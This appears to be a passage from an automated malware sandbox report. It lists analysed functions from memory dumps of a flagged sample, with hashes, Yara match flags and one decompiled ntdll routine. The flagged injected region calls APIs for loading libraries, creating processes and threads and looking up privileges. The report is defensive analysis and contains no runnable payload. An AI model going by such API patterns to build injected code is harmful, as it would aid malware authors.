                                                  • Opcode ID: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
                                                  • Instruction ID: 4dccd26cc39d52c8672fbc7d86233c8cc2fba3171933d9bc2fb73989efd917a9
                                                  • Opcode Fuzzy Hash: 39c4bf2ce54a3979b787dc4b433c83bd8975dc10638a02b0d613b46fb478fcb9
                                                  • Instruction Fuzzy Hash: 6890027125100813F111615945047070169A7D0687F91C412A0415658D9696D966B161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
                                                  • Instruction ID: b29610b91f9d3869451dfa8c52bd01758d00146856da6b81399bce423772e05a
                                                  • Opcode Fuzzy Hash: 1a94a3467f6a938f25d52b8cdfcdde79820147c7ca079d818a3b2ec5d801cd90
                                                  • Instruction Fuzzy Hash: DF900265261004032105A559070450701A6A7D5797751C021F1006650CD661D8757161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
                                                  • Instruction ID: c324a024072fcc2bef660928dc62e452dab71075663b4e6d26c0ea43b29ee4a0
                                                  • Opcode Fuzzy Hash: 479a0b12784b1bf05c91b3819bd7230d937a0ef6a2b31c23b67fc93e8d8832ba
                                                  • Instruction Fuzzy Hash: 9F9002B125100802F140715944047460165A7D0747F51C011A5055654E8699DDE976A5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 045295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
                                                  • Instruction ID: 0bc1ff4937e3ba340e7f1edb299a920f3251ced99a3d805916b077b2d53932e2
                                                  • Opcode Fuzzy Hash: 6733525646795e5f3a01a3778d2ba690a61da4c39dfd21210e34c34d1e1010a9
                                                  • Instruction Fuzzy Hash: 5C9002A125200403610571594414616416AA7E0647F51C021E1005690DC565D8A57165
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 045299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
                                                  • Instruction ID: ec3bfbf4279e4b94579c097381f43948559d692bce8baf12a48c589efadc6b1b
                                                  • Opcode Fuzzy Hash: e161ddf6476a1362f7fe3fa237cabd82b5a6140c067279029f4a9a77d28567e3
                                                  • Instruction Fuzzy Hash: D19002A139100842F10061594414B060165E7E1747F51C015E1055654D8659DC667166
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
                                                  • Instruction ID: 4cacdffea3d314c1e4881e09cef95e4391045ebdf61be52ec85a6537f7e6af1c
                                                  • Opcode Fuzzy Hash: 6b93f95643bbbc431befde6693554870bdab0e201925bb92707cc472be7a6fba
                                                  • Instruction Fuzzy Hash: F190026126180442F20065694C14B070165A7D0747F51C115A0145654CC955D8757561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 045296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
                                                  • Instruction ID: 889d0e15bb47f286039b010a476c14fea61578d6442d5a2f9f29d4a3dcbbceb2
                                                  • Opcode Fuzzy Hash: 0afa338c2aa1dcb72544dfb8013268f351d0df39a00ee38c84dc6081680e4ab7
                                                  • Instruction Fuzzy Hash: DE90027125100C42F10061594404B460165A7E0747F51C016A0115754D8655D8657561
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 045296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
                                                  • Instruction ID: 4e10ca3a3fe42c049bad4bdfb89407ca5306be41b1c0c4dd460edf60ae3592d2
                                                  • Opcode Fuzzy Hash: 9b043f29ff979579cfcc6f2e52eeda6876ca025c87dd88b62c2e94a166b550ce
                                                  • Instruction Fuzzy Hash: 8690027125108C02F1106159840474A0165A7D0747F55C411A4415758D86D5D8A57161
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
                                                  • Instruction ID: 7a6e8ab3648808f6f4ac5afd6173953cf8fad3d23d233fd5c3e394cab7571a06
                                                  • Opcode Fuzzy Hash: 8877387933711da21b27aff551a1b304113902d853f3cd889e9e626c1ca64379
                                                  • Instruction Fuzzy Hash: 7390027125100802F100659954086460165A7E0747F51D011A5015655EC6A5D8A57171
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
                                                  • Instruction ID: 59eafbbb9058fa4b32c821a5ab0951fdf15b27addcdce71b2efaeab1c22176fa
                                                  • Opcode Fuzzy Hash: 0fc1b3e1e4a62812bf2349f76c0f13fdb883cb0b5d29fa29077409f0699a5191
                                                  • Instruction Fuzzy Hash: 5790027136114802F110615984047060165A7D1647F51C411A0815658D86D5D8A57162
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04529780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
                                                  • Instruction ID: 91b6eda25b6555d9c98beaf2d46df3b50950170664e9ff8f8351f0c14f28c05c
                                                  • Opcode Fuzzy Hash: bb98533917a237d5d7cfa858f2978261f7703ddfc80304325a03f6f17bf70d12
                                                  • Instruction Fuzzy Hash: 1490026926300402F1807159540860A0165A7D1647F91D415A0006658CC955D87D7361
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004688D2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00453B93), ref: 0046890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`$F5F
                                                  • API String ID: 3298025750-1470901085
                                                  • Opcode ID: 2f827f31ae371fa4ea9431c39925cfed47eed1130b3f7c0e83622d540b5cfca8
                                                  • Instruction ID: 78c88dd58a6fa17fa0e35fbac5fe90df7eda86e6b8b6d7c4bf5ac2a386fd2027
                                                  • Opcode Fuzzy Hash: 2f827f31ae371fa4ea9431c39925cfed47eed1130b3f7c0e83622d540b5cfca8
                                                  • Instruction Fuzzy Hash: 36F08CB2210209AFDB14EF59DC45EE733A8EF88350F11859AFD0897341E630EA14CBB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004672F0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 00467398
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: 560459eed9d0c93dc52189b6b35de198daa11861ddd5cc2fff839c11670cee40
                                                  • Instruction ID: 34e1a5e8615039b65d73b2b402e548ca32be55f45be51587812b06218ad39926
                                                  • Opcode Fuzzy Hash: 560459eed9d0c93dc52189b6b35de198daa11861ddd5cc2fff839c11670cee40
                                                  • Instruction Fuzzy Hash: 1831B2B6505604ABC711DF65C8A1FA7B7B8BF48704F00811EFA1A9B241E774B845CBE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004672E6, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 83sleepCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • Sleep.KERNELBASE(000007D0), ref: 00467398
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Sleep
                                                  • String ID: net.dll$wininet.dll
                                                  • API String ID: 3472027048-1269752229
                                                  • Opcode ID: bb134cb23f2739f913bfb507a87d36ba7de59bb782a779b9a76be112dc90ea45
                                                  • Instruction ID: 395cb5e231f493c214488167f0240a629a1ea9e404f953a2c1244c99c6a7da50
                                                  • Opcode Fuzzy Hash: bb134cb23f2739f913bfb507a87d36ba7de59bb782a779b9a76be112dc90ea45
                                                  • Instruction Fuzzy Hash: F621C372605605ABC711DF64C8A1F9BB7B4BB48704F10801EFA199B342E778A855CBE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004688E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00453B93), ref: 0046890D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID: .z`
                                                  • API String ID: 3298025750-1441809116
                                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction ID: a674dcb409eea48b59bbb0725275cc0bb078e310cc0a1904a3aa44be417f5d73
                                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                  • Instruction Fuzzy Hash: 47E046B1200208ABDB18EF99CC49EE777ACEF88750F118559FE085B242D670F914CAF0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00457290, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 004572EA
                                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0045730B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: MessagePostThread
                                                  • String ID:
                                                  • API String ID: 1836367815-0
                                                  • Opcode ID: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                  • Instruction ID: e2dbca41b1694731b95f317a2a44e1f01d117ebcf72816368e25a630b740c855
                                                  • Opcode Fuzzy Hash: 3e45670befda317f76231e839ee3ec830ac1bb819c56bc285ac06765e38e55f1
                                                  • Instruction Fuzzy Hash: 2A01A731A8022877E721AA959C03FFF776C5B01B55F14015AFF04BA1C2E6986D0987FA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00459B50, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00459BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction ID: 3c94f37a8715ea9ed6b008ca924ca7fa30a5a19ce205b0f036a6265449aa8bc1
                                                  • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                  • Instruction Fuzzy Hash: 4B0152B5E0010DE7DB10DBA1DC42F9EB378AB54308F044199ED0897241F674EB58CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0046894D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004689A4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 8c83c7642f93f5f614a0161620f1223421d22337f83b039141abbaee908fa446
                                                  • Instruction ID: 975a4f7206a6c2153f8bf29e6d462599be0312a2d31518fd48604432437f288b
                                                  • Opcode Fuzzy Hash: 8c83c7642f93f5f614a0161620f1223421d22337f83b039141abbaee908fa446
                                                  • Instruction Fuzzy Hash: DA01AFB2204108AFDB58CF89DC80EEB37AEAF8C354F158259BA0DD7250D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00468950, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 004689A4
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateInternalProcess
                                                  • String ID:
                                                  • API String ID: 2186235152-0
                                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction ID: d86b0c10fbefc9a7765bfc9736f452373ff9aa227ea6f6fddacfc384b4687e50
                                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                  • Instruction Fuzzy Hash: A601AFB2210108ABCB58DF89DC80EEB77ADAF8C754F158258BA0D97241D630E851CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00459B43, Relevance: 1.5, APIs: 1, Instructions: 42libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00459BC2
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Load
                                                  • String ID:
                                                  • API String ID: 2234796835-0
                                                  • Opcode ID: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                  • Instruction ID: 63a0223f9340141d6533be55c42bd41712fdaf7dbc53c55459b9e449e7bc2b09
                                                  • Opcode Fuzzy Hash: 06ec5ad617f0480dac7ab3218ad283f91d90700fe353b1101687e29cdd682e72
                                                  • Instruction Fuzzy Hash: 0EF0A4B1A4010EEBDF00DA90E842F9DB774EB54309F008296ED189B281F671EA09CB82
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00467420, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0045CD00,?,?), ref: 0046745C
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateThread
                                                  • String ID:
                                                  • API String ID: 2422867632-0
                                                  • Opcode ID: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                  • Instruction ID: 254b706cac271740d2b102bb05f7c80ba6027bc87ab6e85da37483e919a52634
                                                  • Opcode Fuzzy Hash: 51ba582e3e911b42fa11c135c165df8541740ea8ef473cff33f2ac28b774aa9f
                                                  • Instruction Fuzzy Hash: 0AE092737843143AE330659DEC03FA7B39CCB81B25F14002AFA0DEB2C1E999F80146A9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00468A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0045CFD2,0045CFD2,?,00000000,?,?), ref: 00468A70
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: LookupPrivilegeValue
                                                  • String ID:
                                                  • API String ID: 3899507212-0
                                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction ID: f517289f3f0e82db03c69d83c534002bed503640103a64345180f6143d7706b6
                                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                  • Instruction Fuzzy Hash: 4AE01AB12002086BDB14DF49CC85EE737ADAF89650F118155BE0857241D974E8148BF5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0045D438, Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00457C93,?), ref: 0045D46B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 2af872b58be13a52528e5bf053726f9852ba35b549a49072cbee02cf5190a086
                                                  • Instruction ID: 214809255628c6069eb456434d35930777e8fd8361c8ba5c958338d8c6b2b839
                                                  • Opcode Fuzzy Hash: 2af872b58be13a52528e5bf053726f9852ba35b549a49072cbee02cf5190a086
                                                  • Instruction Fuzzy Hash: 4CD097947BC3453FE721AEB02E03F1326480B42380F490A9DB84DEF2C3E84CC518413A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0045D440, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNELBASE(00008003,?,?,00457C93,?), ref: 0045D46B
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, Offset: 00450000, based on PE: false
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ErrorMode
                                                  • String ID:
                                                  • API String ID: 2340568224-0
                                                  • Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                  • Instruction ID: 1deba41e691c9abddd34b7b25c9cf4944eb7cca959f0145e796472f14c4d8d6d
                                                  • Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
                                                  • Instruction Fuzzy Hash: CCD05E617503082AE610AAA89C03F2632885B45B05F494064F949973C3E964E5008565
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0452967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID:
                                                  • API String ID: 2994545307-0
                                                  • Opcode ID: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
                                                  • Instruction ID: 17dba3ffacc9696046cebc841402da2e65c322d3a7d9d3dddc9c2f3816df4448
                                                  • Opcode Fuzzy Hash: 5a4a3a1c38a740da365a9de810e31417287b3cbc7ca11d618a6085fba4b790ac
                                                  • Instruction Fuzzy Hash: 55B02BB19010C4C9F700D76007087173A5077C0702F12C022D1020340A0338E094F1B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

                                                  Function 0457FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 53%
                                                  			E0457FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0452CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04575720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04575720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                  0x0457fdda
                                                  0x0457fde2
                                                  0x0457fde5
                                                  0x0457fdec
                                                  0x0457fdfa
                                                  0x0457fdff
                                                  0x0457fe0a
                                                  0x0457fe0f
                                                  0x0457fe17
                                                  0x0457fe1e
                                                  0x0457fe19
                                                  0x0457fe19
                                                  0x0457fe19
                                                  0x0457fe20
                                                  0x0457fe21
                                                  0x0457fe22
                                                  0x0457fe25
                                                  0x0457fe40

                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0457FDFA
                                                  Strings
                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0457FE2B
                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0457FE01
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.628302033.00000000044C0000.00000040.00000001.sdmp, Offset: 044C0000, based on PE: true
                                                  • Associated: 0000000B.00000002.628814333.00000000045DB000.00000040.00000001.sdmp Download File
                                                  • Associated: 0000000B.00000002.628911304.00000000045DF000.00000040.00000001.sdmp Download File
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                  • API String ID: 885266447-3903918235
                                                  • Opcode ID: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
                                                  • Instruction ID: c45c053610e81c6333d7c7df413c397f3541aa6d824a059ad467a06f61bc3de5
                                                  • Opcode Fuzzy Hash: a1a4877971e12b2a92b4dd32e274ec01a3c307c89ba4e0d55b915c39b06d1c35
                                                  • Instruction Fuzzy Hash: C7F0FC322005017FEA211A55EC01F237B6AFB84770F240315F624555D1E9A2F820A6F4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%